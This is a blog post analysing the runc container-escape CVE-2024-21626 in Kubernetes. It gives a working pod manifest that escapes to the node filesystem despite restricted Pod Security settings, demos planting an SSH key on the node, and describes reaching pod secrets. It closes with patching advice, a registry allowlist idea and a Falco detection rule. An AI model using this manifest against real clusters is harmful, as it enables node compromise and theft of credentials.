Analysis of the CVE

On the 31st of January 2024, a new CVE was released for the runc container runtime, which makes it possible to breakout of a container. The short summary of the CVE is that due to a file descriptor leak internally in runc, it is possible to access the host’s filesystem from within a container when starting the container with a specific working directory. This effects runc 1.1.11 and earlier.

More info can be read in the very thorough CVE release in the runc Github repository opencontainers/runc/GHSA-xr7r-f8xq-vfvv

Since runc is used as the container runtime for containerd and containerd is used for most Kubernetes clusters, how will this CVE affect your Kubernetes cluster? Are you protected against this CVE if you are enforcing the “restricted” Pod Security Standard(PSS) with an admission controller like Pod Security Admission, Kyverno or Gatekeeper? Can this CVE be exploited when you don’t allow root containers for example?

Let’s put on our hacker hat on and explore!

Translation of the CVE to a Kubernetes manifest

Let’s try attack 1 from the CVE documentation, if you set the container process.cwd to /proc/self/fd/7/ (the 7 can be environment specific and depends on the opening order in runc) it will leave the host system accessible. In your Kubernetes pod manifest the process.cwd (cwd stands for current working directory) is set with the spec.containers[].workingDir.

I am also interested in testing if this CVE can be exploited when you are still compliant with the Pod Security Standard. So in the following example I set the securityContext as strict as possible so that the container completely complies with the PSS and it would be allowed to run on the cluster, even with the “restricted” enforced. I chose to run as user 1000 since that is the default uid of the first user on Linux, this user probably exist on the underlying node and that gives me write access to the user home folder and files allowed to write by members.

A simple sleep infinite will keep the container running so I can kubectl exec -it into the container to get a shell.

---
apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
  namespace: cve-2024-21626
spec:
  containers:
    - name: container
      image: alpine
      workingDir: /proc/self/fd/7
      command:
        - sleep
        - infinite
      securityContext:
        capabilities:
          drop:
            - ALL
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        seccompProfile:
          type: RuntimeDefault
        runAsNonRoot: true
        runAsUser: 1000

Demonstration

So in the GIF below you can see three screens, the top screen shows the running pods in the cve-2024-21626 namespace. The bottom screen is a shell on the node were the pod runs via SSH. First, in the bottom node shell I show the content of the ~/.ssh/authorized_keys file to be empty. Then I create the Kubernetes pod from the pod spec above, you can see it starting in the top screen. The I use kubectl exec -it to access the shell and lo and behold under the ../../../../ the node filesystem is present!

As a demonstration I edit the ../../../../home/ubuntu/authorized_keys to gain remote access to the ubuntu user on this node. And show on the node shell that it indeed has been edited on the node.

Demo of the CVE to gain access to the underlying node filesystem

I have tested this pod on Azure AKS and a local cluster setup with Rancher RKE2 and on both I was able to get this working. The only thing that takes some trail and error is the /proc/self/fd/7/ path, the number changes even on the same node. Biggest success rate was with /proc/self/fd/7/ but /proc/self/fd/9/ was also common.

Implications

As seen in the demo above it is pretty ease to gain access to the node filesystem by exploiting the CVE. The demo above was pretty simple and required a shell to a container where I executed some manual steps. But this can be easily automated and put into a container image that looks normal but still adds a malicious SSH key or payload to the underlying node. Then this image only needs starting on the cluster to be effective.

As soon as someone has access to the node, your whole cluster is pretty much compromised. The pods running on the node mount their secrets (database passwords, Kubernetes API tokens), configmaps and volumes under /var/lib/kubelet/pods so a quick look through those directories and you can have access to databases belonging to the apps. Since those files and directories are readable by everyone on the system you don’t need to be root in the container to access these.

# ls -l /var/lib/kubelet/pods/b68ccf8b-ebc9-4cd7-8454-92ead5d0887e/volumes/kubernetes.io~secret/config/
lrwxrwxrwx    1 root     root            13 Feb  6 22:00 config.yaml -> ..data/config.yaml

So it is not just your Kubernetes cluster at risk, even services accessed from the cluster can now be at risk.

Mitigation and detection

As seen above it just having a tool that analyses the pod manifest (PSA, Kyverno, Gatekeeper) will fall short to catch this CVE. Since you can run the pod with the most “restricted” pod security policy and still exploit this CVE. The easiest mitigation would be to update to the latest patched runc 1.12.0 which is available as we speak.

Since most of you use a (cloud)product that integrates runc here a set of links for reference in what versions runc has been patched:

If patching for some reason is not yet possible you can decrease the risk by allowing only images to be pulled from a trusted registry. To avoid a malicious image to be run from the internet by social engineering or by accident. This can be setup with the help of an admission controllers like Kyverno or Gatekeeper. You can create an admission policy where it only allows the image to be from a certain registry URL. It is then your responsibility to have secure images, the base image you build from could still be compromised.

For runtime detection, the awesome people of Snyk have made a detection tool available container breakouts or “leaky vessels” as they call them. snyk/leaky-vessels-dynamic-detector will watch and check for a set of possible container breakouts. You can run this tool as daemonset on Kubernetes for detection of just CVE-2024-21626 or run it privileged on the node to detect all the mentioned vulnerabilities. It will output on the stdout if an exploit is detected, you can setup alerts on these loglines to have detection.

Another way to detect if someone is exploiting this CVE is with Falco, the user @NitroCao shared this Falco rule on his Github. But he places a asterisk that filtering false positives with proc.name != "runc:[1:CHILD] is not a good solution

# source: https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file#how-to-detect
- macro: container
  condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
  desc: >
        Detect CVE-2024-21626, runC escape vulnerability through /proc/[PID]/cwd.
  condition: >
    container and (
      (evt.type = execve and proc.cwd startswith "/proc/self/fd") or
      (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or
      (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")
    ) and proc.name != "runc:[1:CHILD]"    
  output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
  priority: CRITICAL

So I would advise where possible to just upgrade to the latest runc, then you are sure that this CVE has been mitigated.

Hopefully you found this post useful, it was for sure fun for me to play with this CVE :)